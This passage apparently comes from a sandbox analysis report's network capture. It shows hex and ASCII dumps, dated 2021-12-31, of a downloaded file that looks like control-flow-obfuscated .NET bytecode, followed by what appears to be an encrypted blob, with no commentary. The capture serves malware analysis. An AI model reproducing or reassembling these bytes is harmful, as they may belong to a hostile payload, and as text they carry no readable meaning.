                                                                                                                                                                                                          Data Ascii: ,>{# @(i#5@(isQoR#D@A(i#D:A(i,(#t@(i9#@(i#E@(i,(#w@(i9|#@tA(i#@(i,(#@(i9#@(i#
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC598INData Raw: 00 c0 52 40 28 32 0c 00 06 69 0a 23 00 00 00 00 00 f6 a9 40 28 33 0c 00 06 69 0c 00 08 23 00 00 00 00 00 60 95 40 28 34 0c 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 c0 96 40 28 35 0c 00 06 69 fe 01 39 a9 62 03 00 23 00 00 00 00 f1 98 3c 41 28 36 0c 00 06 69 0c 00 08 23 00 00 00 00 00 0c 9f 40 28 37 0c 00 06 69 fe 01 2c 28 00 06 23 00 00 00 00 00 c4 d7 40 28 38 0c 00 06 69 fe 01 39 61 19 03 00 23 00 00 00 00 08 27 4e 41 28 39 0c 00 06 69 0c 00 08 23 00 00 00 00 92 1c 4a 41 28 3a 0c 00 06 69 fe 01 2c 20 23 00 00 00 00 00 64 15 41 28 3b 0c 00 06 69 0b 23 00 00 00 00 00 ec 9c 40 28 3c 0c 00 06 69 0c 00 08 23 00 00 00 00 00 70 98 40 28 3d 0c 00 06 69 fe 01 2c 25 02 7b 3c 00 00 04 72 39 07 00 70 28 01 00 00 06 6f 50 00 00 0a 23 00 00 00 80 a4 af 42 41 28 3e
                                                                                                                                                                                                          Data Ascii: R@(2i#@(3i#`@(4i,(#@(5i9b#<A(6i#@(7i,(#@(8i9a#'NA(9i#JA(:i, #dA(;i#@(<i#p@(=i,%{<r9p(oP#BA(>
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC614INData Raw: 00 00 f2 1a 29 41 28 81 0f 00 06 69 fe 01 2c 20 23 00 00 00 00 40 de d2 40 28 82 0f 00 06 69 0a 23 00 00 00 00 20 29 29 41 28 83 0f 00 06 69 0c 00 08 23 00 00 00 20 ae 1c 67 41 28 84 0f 00 06 69 fe 01 2c 25 02 7b 33 00 00 04 72 2f 08 00 70 28 01 00 00 06 6f 50 00 00 0a 23 00 00 00 80 14 20 67 41 28 85 0f 00 06 69 0c 00 08 23 00 00 00 00 00 25 b4 40 28 86 0f 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 90 67 11 41 28 87 0f 00 06 69 fe 01 39 88 fc ff ff 23 00 00 00 00 00 26 b4 40 28 88 0f 00 06 69 0c 00 08 23 00 00 00 80 ac 7f 47 41 28 89 0f 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 84 93 40 28 8a 0f 00 06 69 fe 01 39 cb eb 01 00 23 00 00 00 00 00 70 9b 40 28 8b 0f 00 06 69 0c 00 08 23 00 00 00 80 b0 de 60 41 28 8c 0f 00 06 69 fe 01 2c 20 23 00 00 00 00 90
                                                                                                                                                                                                          Data Ascii: )A(i, #@@(i# ))A(i# gA(i,%{3r/p(oP# gA(i#%@(i,(#gA(i9#&@(i#GA(i,(#@(i9#p@(i#`A(i, #
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC630INData Raw: 72 e8 2a 41 28 c7 12 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 00 73 40 28 c8 12 00 06 69 fe 01 39 ff 5f 00 00 23 00 00 00 00 00 60 8d 40 28 c9 12 00 06 69 0c 00 08 23 00 00 00 80 c4 f0 6d 41 28 ca 12 00 06 69 fe 01 2c 20 23 00 00 00 00 d1 c3 31 41 28 cb 12 00 06 69 0b 23 00 00 00 20 a3 f4 6d 41 28 cc 12 00 06 69 0c 00 08 23 00 00 00 00 00 7b b4 40 28 cd 12 00 06 69 fe 01 2c 20 23 00 00 00 00 00 20 ec 40 28 ce 12 00 06 69 0b 23 00 00 00 00 c1 39 7a 41 28 cf 12 00 06 69 0c 00 08 23 00 00 00 00 51 48 30 41 28 d0 12 00 06 69 fe 01 2c 20 23 00 00 00 00 00 a0 79 40 28 d1 12 00 06 69 0a 23 00 00 00 00 00 28 90 40 28 d2 12 00 06 69 0c 00 08 23 00 00 00 00 00 d4 a4 40 28 d3 12 00 06 69 fe 01 2c 20 23 00 00 00 00 00 a4 9a 40 28 d4 12 00 06 69 0b 23 00 00 00 40
                                                                                                                                                                                                          Data Ascii: r*A(i,(#s@(i9_#`@(i#mA(i, #1A(i# mA(i#{@(i, # @(i#9zA(i#QH0A(i, #y@(i#(@(i#@(i, #@(i#@
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC646INData Raw: 06 69 fe 01 2c 20 23 00 00 00 00 00 00 79 40 28 14 16 00 06 69 0a 23 00 00 00 00 20 f7 4a 41 28 15 16 00 06 69 0c 00 08 23 00 00 00 00 e1 c7 54 41 28 16 16 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 e0 70 40 28 17 16 00 06 69 fe 01 39 2a d5 fe ff 23 00 00 00 00 00 3e a2 40 28 18 16 00 06 69 0c 00 08 23 00 00 00 10 83 11 79 41 28 19 16 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 00 54 40 28 1a 16 00 06 69 fe 01 39 62 e4 ff ff 23 00 00 00 00 04 14 79 41 28 1b 16 00 06 69 0c 00 08 23 00 00 00 00 00 d0 ab 40 28 1c 16 00 06 69 fe 01 2c 20 23 00 00 00 00 00 40 6e 40 28 1d 16 00 06 69 0b 23 00 00 00 20 c2 2f 68 41 28 1e 16 00 06 69 0c 00 08 23 00 00 00 90 b1 f9 70 41 28 1f 16 00 06 69 fe 01 2c 20 23 00 00 00 00 00 90 96 40 28 20 16 00 06 69 0a 23 00 00 00 00
                                                                                                                                                                                                          Data Ascii: i, #y@(i# JA(i#TA(i,(#p@(i9*#>@(i#yA(i,(#T@(i9b#yA(i#@(i, #@n@(i# /hA(i#pA(i, #@( i#
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC662INData Raw: fe 01 39 ac dc fe ff 23 00 00 00 00 00 6e ab 40 28 5e 19 00 06 69 0c 00 08 23 00 00 00 00 00 98 8e 40 28 5f 19 00 06 69 fe 01 2c 28 00 06 23 00 00 00 00 00 30 78 40 28 60 19 00 06 69 fe 01 39 68 8e ff ff 23 00 00 00 00 20 4f 2d 41 28 61 19 00 06 69 0c 00 08 23 00 00 00 00 00 28 b2 40 28 62 19 00 06 69 fe 01 2c 20 23 00 00 00 00 90 ac 14 41 28 63 19 00 06 69 0a 23 00 00 00 00 00 29 b2 40 28 64 19 00 06 69 0c 00 08 23 00 00 00 40 98 f8 5f 41 28 65 19 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 f2 84 42 41 28 66 19 00 06 69 fe 01 39 2b 43 fe ff 23 00 00 00 00 40 fe 5f 41 28 67 19 00 06 69 0c 00 08 23 00 00 00 00 00 22 a5 40 28 68 19 00 06 69 fe 01 2c 20 23 00 00 00 80 10 b2 44 41 28 69 19 00 06 69 0b 23 00 00 00 00 d1 ee 5b 41 28 6a 19 00 06 69 0c 00 08 23 00
                                                                                                                                                                                                          Data Ascii: 9#n@(^i#@(_i,(#0x@(`i9h# O-A(ai#(@(bi, #A(ci#)@(di#@_A(ei,(#BA(fi9+C#@_A(gi#"@(hi, #DA(ii#[A(ji#
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC678INData Raw: 1c 00 06 69 fe 01 2c 20 23 00 00 00 00 00 80 53 40 28 a5 1c 00 06 69 0b 23 00 00 00 00 00 b6 a3 40 28 a6 1c 00 06 69 0c 00 08 23 00 00 00 00 00 f5 b2 40 28 a7 1c 00 06 69 fe 01 2c 20 23 00 00 00 00 88 d7 25 41 28 a8 1c 00 06 69 0b 23 00 00 00 40 46 78 76 41 28 a9 1c 00 06 69 0c 00 08 23 00 00 00 20 06 15 62 41 28 aa 1c 00 06 69 fe 01 2c 25 02 7b 4d 00 00 04 72 9d 0f 00 70 28 01 00 00 06 6f 50 00 00 0a 23 00 00 00 00 00 10 a8 40 28 ab 1c 00 06 69 0c 00 08 23 00 00 00 00 00 b0 9b 40 28 ac 1c 00 06 69 fe 01 2c 20 23 00 00 00 00 00 00 2a 40 28 ad 1c 00 06 69 0b 23 00 00 00 00 00 b4 9b 40 28 ae 1c 00 06 69 0c 00 08 23 00 00 00 90 08 00 76 41 28 af 1c 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 a0 7e 40 28 b0 1c 00 06 69 fe 01 39 f3 33 02 00 23 00 00 00 00 61
                                                                                                                                                                                                          Data Ascii: i, #S@(i#@(i#@(i, #%A(i#@FxvA(i# bA(i,%{Mrp(oP#@(i#@(i, #*@(i#@(i#vA(i,(#~@(i93#a
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC694INData Raw: 28 ea 1f 00 06 69 0c 00 08 23 00 00 00 40 fc 91 53 41 28 eb 1f 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 30 8d 40 28 ec 1f 00 06 69 fe 01 39 e6 c1 fd ff 23 00 00 00 00 00 b4 a1 40 28 ed 1f 00 06 69 0c 00 08 23 00 00 00 00 00 a0 b1 40 28 ee 1f 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 90 63 fc 40 28 ef 1f 00 06 69 fe 01 39 16 36 ff ff 23 00 00 00 10 74 6c 73 41 28 f0 1f 00 06 69 0c 00 08 23 00 00 00 00 69 96 73 41 28 f1 1f 00 06 69 fe 01 2c 20 23 00 00 00 00 00 70 8d 40 28 f2 1f 00 06 69 0b 23 00 00 00 90 9f 98 73 41 28 f3 1f 00 06 69 0c 00 08 23 00 00 00 80 14 6d 6e 41 28 f4 1f 00 06 69 fe 01 2c 3e 02 7b 26 00 00 04 23 00 00 00 00 00 b0 7f 40 28 f5 1f 00 06 69 23 00 00 00 00 00 88 84 40 28 f6 1f 00 06 69 73 5b 00 00 0a 6f 5c 00 00 0a 23 00 00 00 20 fb
                                                                                                                                                                                                          Data Ascii: (i#@SA(i,(#0@(i9#@(i#@(i,(#c@(i96#tlsA(i#isA(i, #p@(i#sA(i#mnA(i,>{&#@(i#@(is[o\#
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC710INData Raw: 0c 00 08 23 00 00 00 00 20 d5 6c 41 28 38 23 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 08 89 40 28 39 23 00 06 69 fe 01 39 b1 58 ff ff 23 00 00 00 00 00 62 ae 40 28 3a 23 00 06 69 0c 00 08 23 00 00 00 00 00 e0 8c 40 28 3b 23 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 64 50 10 41 28 3c 23 00 06 69 fe 01 39 83 3c 01 00 23 00 00 00 00 00 e8 8c 40 28 3d 23 00 06 69 0c 00 08 23 00 00 00 80 20 3c 41 41 28 3e 23 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 20 6b 07 41 28 3f 23 00 06 69 fe 01 39 f2 dd 01 00 23 00 00 00 00 00 42 41 41 28 40 23 00 06 69 0c 00 08 23 00 00 00 00 00 c8 b1 40 28 41 23 00 06 69 fe 01 2c 20 23 00 00 00 00 00 20 79 40 28 42 23 00 06 69 0a 23 00 00 00 00 00 c9 b1 40 28 43 23 00 06 69 0c 00 08 23 00 00 00 80 18 4f 48 41 28 44 23 00 06 69 fe
                                                                                                                                                                                                          Data Ascii: # lA(8#i,(#@(9#i9X#b@(:#i#@(;#i,(#dPA(<#i9<#@(=#i# <AA(>#i,(# kA(?#i9#BAA(@#i#@(A#i, # y@(B#i#@(C#i#OHA(D#i
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC726INData Raw: 80 0c e2 41 41 28 82 26 00 06 69 0b 23 00 00 00 00 00 1f b4 40 28 83 26 00 06 69 0c 00 08 23 00 00 00 00 00 00 78 40 28 84 26 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 90 ac f4 40 28 85 26 00 06 69 fe 01 39 f1 64 ff ff 23 00 00 00 00 00 10 78 40 28 86 26 00 06 69 0c 00 08 23 00 00 00 20 34 f6 62 41 28 87 26 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 e8 82 40 28 88 26 00 06 69 fe 01 39 bc ce 00 00 23 00 00 00 00 00 a4 a8 40 28 89 26 00 06 69 0c 00 08 23 00 00 00 40 80 3a 5e 41 28 8a 26 00 06 69 fe 01 2c 28 00 06 23 00 00 00 00 c8 0b 03 41 28 8b 26 00 06 69 fe 01 39 a3 24 00 00 23 00 00 00 00 00 40 5e 41 28 8c 26 00 06 69 0c 00 08 23 00 00 00 00 00 47 b1 40 28 8d 26 00 06 69 fe 01 2c 28 00 06 23 00 00 00 00 00 00 d0 40 28 8e 26 00 06 69 fe 01 39 d0 cb fd
                                                                                                                                                                                                          Data Ascii: AA(&i#@(&i#x@(&i,(#@(&i9d#x@(&i# 4bA(&i,(#@(&i9#@(&i#@:^A(&i,(#A(&i9$#@^A(&i#G@(&i,(#@(&i9
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC742INData Raw: 00 00 00 40 18 42 51 41 28 d1 29 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 c8 26 41 28 d2 29 00 06 69 fe 01 39 66 c0 00 00 23 00 00 00 00 00 a0 a0 40 28 d3 29 00 06 69 0c 00 08 23 00 00 00 00 00 cc a8 40 28 d4 29 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 b0 88 40 28 d5 29 00 06 69 fe 01 39 49 72 ff ff 23 00 00 00 00 00 ce a8 40 28 d6 29 00 06 69 0c 00 08 23 00 00 00 00 00 24 b1 40 28 d7 29 00 06 69 fe 01 2c 20 23 00 00 00 00 00 60 64 40 28 d8 29 00 06 69 0b 23 00 00 00 90 f5 5e 72 41 28 d9 29 00 06 69 0c 00 08 23 00 00 00 20 8d be 6d 41 28 da 29 00 06 69 fe 01 2c 28 00 06 23 00 00 00 00 48 d4 08 41 28 db 29 00 06 69 fe 01 39 33 c6 fe ff 23 00 00 00 00 00 dc ae 40 28 dc 29 00 06 69 0c 00 08 23 00 00 00 00 00 40 99 40 28 dd 29 00 06 69 fe 01 2c 20 23
                                                                                                                                                                                                          Data Ascii: @BQA()i,(#&A()i9f#@()i#@()i,(#@()i9Ir#@()i#$@()i, #`d@()i#^rA()i# mA()i,(#HA()i93#@()i#@@()i, #
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC758INData Raw: 41 28 16 2d 00 06 69 0c 00 08 23 00 00 00 00 00 bb b3 40 28 17 2d 00 06 69 fe 01 2c 20 23 00 00 00 00 00 99 32 41 28 18 2d 00 06 69 0b 23 00 00 00 00 00 bc b3 40 28 19 2d 00 06 69 0c 00 08 23 00 00 00 00 00 3a ac 40 28 1a 2d 00 06 69 fe 01 2c 1b 02 73 5d 00 00 0a 7d 4a 00 00 04 23 00 00 00 80 70 e9 68 41 28 1b 2d 00 06 69 0c 00 08 23 00 00 00 40 8c 5f 74 41 28 1c 2d 00 06 69 fe 01 2c 20 23 00 00 00 00 00 70 87 40 28 1d 2d 00 06 69 0b 23 00 00 00 00 00 0f b2 40 28 1e 2d 00 06 69 0c 00 08 23 00 00 00 00 00 4a af 40 28 1f 2d 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 42 01 41 28 20 2d 00 06 69 fe 01 39 61 5e ff ff 23 00 00 00 00 00 4c af 40 28 21 2d 00 06 69 0c 00 08 23 00 00 00 20 2a 6e 60 41 28 22 2d 00 06 69 fe 01 2c 28 00 06 23 00 00 00 00 00 80 78 40
                                                                                                                                                                                                          Data Ascii: A(-i#@(-i, #2A(-i#@(-i#:@(-i,s]}J#phA(-i#@_tA(-i, #p@(-i#@(-i#J@(-i,(#BA( -i9a^#L@(!-i# *n`A("-i,(#x@
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC774INData Raw: 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 81 10 41 28 5f 30 00 06 69 fe 01 39 a3 85 ff ff 23 00 00 00 00 00 60 73 40 28 60 30 00 06 69 0c 00 08 23 00 00 00 40 c6 fa 71 41 28 61 30 00 06 69 fe 01 2c 20 23 00 00 00 00 48 6e 05 41 28 62 30 00 06 69 0a 23 00 00 00 10 e5 fc 71 41 28 63 30 00 06 69 0c 00 08 23 00 00 00 00 80 a0 61 41 28 64 30 00 06 69 fe 01 2c 20 23 00 00 00 00 00 a0 6a 40 28 65 30 00 06 69 0a 23 00 00 00 00 00 c2 a7 40 28 66 30 00 06 69 0c 00 08 23 00 00 00 00 00 42 21 41 28 67 30 00 06 69 fe 01 2c 20 23 00 00 00 00 00 b8 89 40 28 68 30 00 06 69 0b 23 00 00 00 00 00 88 87 40 28 69 30 00 06 69 0c 00 08 23 00 00 00 00 00 a8 85 40 28 6a 30 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 72 5d 27 41 28 6b 30 00 06 69 fe 01 39 ef b4 00 00 23 00 00 00
                                                                                                                                                                                                          Data Ascii: i,(#A(_0i9#`s@(`0i#@qA(a0i, #HnA(b0i#qA(c0i#aA(d0i, #j@(e0i#@(f0i#B!A(g0i, #@(h0i#@(i0i#@(j0i,(#r]'A(k0i9#
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC790INData Raw: 00 00 00 00 20 91 40 28 a8 33 00 06 69 fe 01 2c 39 02 23 00 00 00 00 a9 7e 38 41 28 a9 33 00 06 69 23 00 00 00 00 80 60 c2 40 28 aa 33 00 06 69 73 51 00 00 0a 28 66 00 00 0a 23 00 00 00 00 00 24 91 40 28 ab 33 00 06 69 0c 00 08 23 00 00 00 10 28 9b 72 41 28 ac 33 00 06 69 fe 01 2c 25 02 7b 43 00 00 04 72 19 02 00 70 28 01 00 00 06 6f 50 00 00 0a 23 00 00 00 00 00 42 b1 40 28 ad 33 00 06 69 0c 00 08 23 00 00 00 00 00 a4 a0 40 28 ae 33 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 b1 13 41 28 af 33 00 06 69 fe 01 39 5c 08 fd ff 23 00 00 00 40 ba 52 51 41 28 b0 33 00 06 69 0c 00 08 23 00 00 00 00 00 04 b2 40 28 b1 33 00 06 69 fe 01 2c 20 23 00 00 00 00 00 80 57 40 28 b2 33 00 06 69 0a 23 00 00 00 90 41 4b 74 41 28 b3 33 00 06 69 0c 00 08 23 00 00 00 00 00 c8
                                                                                                                                                                                                          Data Ascii: @(3i,9#~8A(3i#`@(3isQ(f#$@(3i#(rA(3i,%{Crp(oP#B@(3i#@(3i,(#A(3i9\#@RQA(3i#@(3i, #W@(3i#AKtA(3i#
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC806INData Raw: 0a 6f 52 00 00 0a 23 00 00 00 00 00 a8 b4 40 28 ed 36 00 06 69 0c 00 08 23 00 00 00 20 1d ec 6a 41 28 ee 36 00 06 69 fe 01 2c 28 00 06 23 00 00 00 00 00 f0 7a 40 28 ef 36 00 06 69 fe 01 39 b7 fe fe ff 23 00 00 00 00 00 5c ad 40 28 f0 36 00 06 69 0c 00 08 23 00 00 00 00 00 14 b0 40 28 f1 36 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 ac 9b 40 28 f2 36 00 06 69 fe 01 39 0d a9 fd ff 23 00 00 00 00 00 15 b0 40 28 f3 36 00 06 69 0c 00 08 23 00 00 00 00 00 fd b2 40 28 f4 36 00 06 69 fe 01 2c 20 23 00 00 00 00 00 00 1c 40 28 f5 36 00 06 69 0a 23 00 00 00 40 40 8b 76 41 28 f6 36 00 06 69 0c 00 08 23 00 00 00 00 00 38 af 40 28 f7 36 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 40 54 f2 40 28 f8 36 00 06 69 fe 01 39 b6 73 ff ff 23 00 00 00 00 00 3a af 40 28 f9 36 00
                                                                                                                                                                                                          Data Ascii: oR#@(6i# jA(6i,(#z@(6i9#\@(6i#@(6i,(#@(6i9#@(6i#@(6i, #@(6i#@@vA(6i#8@(6i,(#@T@(6i9s#:@(6
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC822INData Raw: a8 92 40 28 37 3a 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 24 c4 38 41 28 38 3a 00 06 69 fe 01 39 8f 51 fe ff 23 00 00 00 00 00 ac 92 40 28 39 3a 00 06 69 0c 00 08 23 00 00 00 00 40 ae 55 41 28 3a 3a 00 06 69 fe 01 2c 20 23 00 00 00 00 b2 c6 43 41 28 3b 3a 00 06 69 0b 23 00 00 00 40 e8 b2 55 41 28 3c 3a 00 06 69 0c 00 08 23 00 00 00 40 4c 6b 5b 41 28 3d 3a 00 06 69 fe 01 2c 20 23 00 00 00 00 e4 33 3f 41 28 3e 3a 00 06 69 0b 23 00 00 00 00 00 f4 a4 40 28 3f 3a 00 06 69 0c 00 08 23 00 00 00 00 00 9c 96 40 28 40 3a 00 06 69 fe 01 2c 1c 02 7b 47 00 00 04 17 6f 4f 00 00 0a 23 00 00 00 00 40 fe 3f 41 28 41 3a 00 06 69 0c 00 08 23 00 00 00 00 00 90 9c 40 28 42 3a 00 06 69 fe 01 2c 1c 02 7b 46 00 00 04 17 6f 5a 00 00 0a 23 00 00 00 00 00 94 9c 40 28 43 3a 00 06
                                                                                                                                                                                                          Data Ascii: @(7:i,(#$8A(8:i9Q#@(9:i#@UA(::i, #CA(;:i#@UA(<:i#@Lk[A(=:i, #3?A(>:i#@(?:i#@(@:i,{GoO#@?A(A:i#@(B:i,{FoZ#@(C:
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC838INData Raw: 3d 00 06 69 fe 01 2c 20 23 00 00 00 00 c2 e4 45 41 28 80 3d 00 06 69 0b 23 00 00 00 00 00 2c b0 40 28 81 3d 00 06 69 0c 00 08 23 00 00 00 00 00 7e ad 40 28 82 3d 00 06 69 fe 01 2c 28 00 06 23 00 00 00 00 90 d4 f3 40 28 83 3d 00 06 69 fe 01 39 4a be ff ff 23 00 00 00 00 00 32 6b 41 28 84 3d 00 06 69 0c 00 08 23 00 00 00 00 00 f0 ae 40 28 85 3d 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 64 bb 31 41 28 86 3d 00 06 69 fe 01 39 15 e2 fe ff 23 00 00 00 20 e6 ec 6d 41 28 87 3d 00 06 69 0c 00 08 23 00 00 00 00 c1 ee 3c 41 28 88 3d 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 82 ba 26 41 28 89 3d 00 06 69 fe 01 39 6a 66 fc ff 23 00 00 00 00 00 88 95 40 28 8a 3d 00 06 69 0c 00 08 23 00 00 00 00 b1 4d 56 41 28 8b 3d 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 a0 90 40
                                                                                                                                                                                                          Data Ascii: =i, #EA(=i#,@(=i#~@(=i,(#@(=i9J#2kA(=i#@(=i,(#d1A(=i9# mA(=i#<A(=i,(#&A(=i9jf#@(=i#MVA(=i,(#@
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC854INData Raw: 00 00 22 40 28 8c 40 00 06 69 fe 0e 01 00 23 00 00 00 00 00 00 82 40 28 8d 40 00 06 69 fe 0e 02 00 00 fe 0c 02 00 23 00 00 00 00 00 80 41 40 28 8e 40 00 06 69 fe 01 39 26 00 00 00 23 00 00 00 00 00 00 59 40 28 8f 40 00 06 69 fe 0e 01 00 23 00 00 00 00 00 40 94 40 28 90 40 00 06 69 fe 0e 02 00 00 fe 0c 02 00 23 00 00 00 00 00 80 40 40 28 91 40 00 06 69 fe 01 39 2e 00 00 00 00 fe 0c 01 00 23 00 00 00 00 00 40 54 40 28 92 40 00 06 69 fe 01 39 2e 00 00 00 23 00 00 00 00 00 00 41 40 28 93 40 00 06 69 fe 0e 02 00 00 fe 0c 02 00 23 00 00 00 00 00 00 42 40 28 94 40 00 06 69 fe 01 39 2e 00 00 00 00 fe 0c 01 00 23 00 00 00 00 00 00 26 40 28 95 40 00 06 69 fe 01 39 ae 00 00 00 23 00 00 00 00 00 64 95 40 28 96 40 00 06 69 fe 0e 02 00 00 fe 0c 02 00 23 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii: "@(@i#@(@i#A@(@i9&#Y@(@i#@@(@i#@@(@i9.#@T@(@i9.#A@(@i#B@(@i9.#&@(@i9#d@(@i#
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC870INData Raw: 69 fe 01 39 26 00 00 00 23 00 00 00 00 00 80 88 40 28 ee 42 00 06 69 fe 0e 05 00 23 00 00 00 00 00 a4 9f 40 28 ef 42 00 06 69 fe 0e 06 00 00 fe 0c 06 00 23 00 00 00 00 00 00 70 40 28 f0 42 00 06 69 fe 01 39 26 00 00 00 23 00 00 00 00 00 00 22 40 28 f1 42 00 06 69 fe 0e 04 00 23 00 00 00 00 00 10 72 40 28 f2 42 00 06 69 fe 0e 06 00 00 fe 0c 06 00 23 00 00 00 00 00 02 cf 40 28 f3 42 00 06 69 fe 01 39 18 00 00 00 38 0b 08 00 00 23 00 00 00 00 00 c0 5f 40 28 f4 42 00 06 69 fe 0e 06 00 00 fe 0c 06 00 23 00 00 00 00 80 24 c3 40 28 f5 42 00 06 69 fe 01 39 2e 00 00 00 00 fe 0c 05 00 23 00 00 00 00 00 00 2e 40 28 f6 42 00 06 69 fe 01 39 09 fd ff ff 23 00 00 00 00 00 88 c3 40 28 f7 42 00 06 69 fe 0e 06 00 00 fe 0c 06 00 23 00 00 00 00 00 80 4a 40 28 f8 42 00 06 69
                                                                                                                                                                                                          Data Ascii: i9&#@(Bi#@(Bi#p@(Bi9&#"@(Bi#r@(Bi#@(Bi98#_@(Bi#$@(Bi9.#.@(Bi9#@(Bi#J@(Bi
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC886INData Raw: 2a 00 11 04 23 00 00 00 00 00 00 39 40 28 8a 45 00 06 69 fe 01 39 40 f3 ff ff 23 00 00 00 00 00 61 b8 40 28 8b 45 00 06 69 13 05 00 11 05 23 00 00 00 00 00 00 44 40 28 8c 45 00 06 69 fe 01 2c 21 23 00 00 00 00 00 40 54 40 28 8d 45 00 06 69 0d 23 00 00 00 00 00 44 9a 40 28 8e 45 00 06 69 13 05 00 11 05 23 00 00 00 00 00 80 88 40 28 8f 45 00 06 69 fe 01 2c 29 00 09 23 00 00 00 00 00 40 54 40 28 90 45 00 06 69 fe 01 39 34 07 00 00 23 00 00 00 00 00 00 3d 40 28 91 45 00 06 69 13 05 00 11 05 23 00 00 00 00 00 80 48 40 28 92 45 00 06 69 fe 01 2c 15 07 17 58 0b 23 00 00 00 00 00 00 50 40 28 93 45 00 06 69 13 05 00 11 05 23 00 00 00 00 00 00 49 40 28 94 45 00 06 69 fe 01 2c 22 23 00 00 00 00 00 00 10 40 28 95 45 00 06 69 13 04 23 00 00 00 00 00 80 49 40 28 96 45
                                                                                                                                                                                                          Data Ascii: *#9@(Ei9@#a@(Ei#D@(Ei,!#@T@(Ei#D@(Ei#@(Ei,)#@T@(Ei94#=@(Ei#H@(Ei,X#P@(Ei#I@(Ei,"#@(Ei#I@(E
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC902INData Raw: 10 79 56 76 af 57 56 43 ac 79 75 59 87 5a 76 51 79 57 43 52 70 8b 55 78 56 f9 38 36 7a 43 52 7a 8b 55 78 56 f9 38 a7 56 63 52 70 75 59 87 57 4e 5a 59 57 43 20 f1 75 59 09 25 59 51 59 5d 39 ac 7c 74 59 53 56 77 51 42 67 47 52 ef 76 59 79 55 77 51 48 24 44 52 70 73 a7 77 56 77 af 55 57 43 72 6a 75 59 79 7e 47 51 59 5d 3e 51 70 75 5d 0a 5f 77 51 5f a9 4d 53 70 55 59 79 56 77 af 57 55 43 72 70 75 59 79 a8 79 52 59 77 43 52 70 75 a7 77 52 77 23 9a 57 43 22 58 44 59 79 5c f9 71 59 57 43 52 8e 76 a7 77 55 77 af 55 56 43 21 42 75 59 73 2b 73 51 59 53 30 61 70 75 53 5c a8 7b 50 59 a9 45 58 70 75 5f 0a 62 77 51 53 24 76 52 70 7f 36 4f 56 77 5b 7c a9 4f 53 70 8b 5f 72 56 77 57 2a 63 43 52 7a 06 6c 79 56 7d 3e 6f 57 43 58 55 8b 55 78 56 89 57 55 57 43 54 03 41 59 79
                                                                                                                                                                                                          Data Ascii: yVvWVCyuYZvQyWCRpUxV86zCRzUxV8VcRpuYWNZYWC uY%YQY]9|tYSVwQBgGRvYyUwQH$DRpswVwUWCrjuYy~GQY]>Qpu]_wQ_MSpUYyVwWUCrpuYyyRYwCRpuwRw#WC"XDYy\qYWCRvwUwUVC!BuYs+sQYS0apuS\{PYEXpu_bwQS$vRp6OVw[|OSp_rVwW*cCRzlyV}>oWCXUUxVWUWCTAYy
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC918INData Raw: 43 54 68 f8 1f 79 56 75 74 4f 24 99 52 70 73 fb 5c 41 71 f3 71 83 43 52 76 7e 5e 7a 39 a5 50 59 51 6b 81 70 75 5f 16 53 76 51 53 53 6b 77 72 75 5f 7e 39 9d 50 59 51 69 41 40 70 59 2c 56 77 51 59 57 43 52 73 1a 9f 78 56 71 7d 15 53 6b 77 72 75 5f 51 64 77 51 5f 38 af 53 70 73 5d 51 73 75 51 5f 40 ce 14 70 75 5b 5c 40 04 a8 59 57 45 f0 58 a1 59 79 50 18 bf 58 57 45 56 58 50 5b 79 50 60 dc 1f 57 43 50 55 63 2a 85 56 77 57 fb 7f 97 52 70 73 36 89 57 77 57 73 57 43 52 6b 45 5f 79 40 76 51 59 7d 43 52 61 06 ba 79 56 7d 5b 5b 38 44 53 70 7f 52 41 b0 77 51 59 50 2c 5a 71 75 53 75 5e 18 36 58 57 45 3d 79 74 59 73 5b 4f e6 59 57 43 5b 1f 7f 58 79 5c 64 55 51 38 26 53 70 73 2b 75 55 77 21 48 53 2c 05 71 75 5f 51 0f 77 51 53 7f df 52 70 7f 2a d7 56 77 5b 48 53 2c 0b
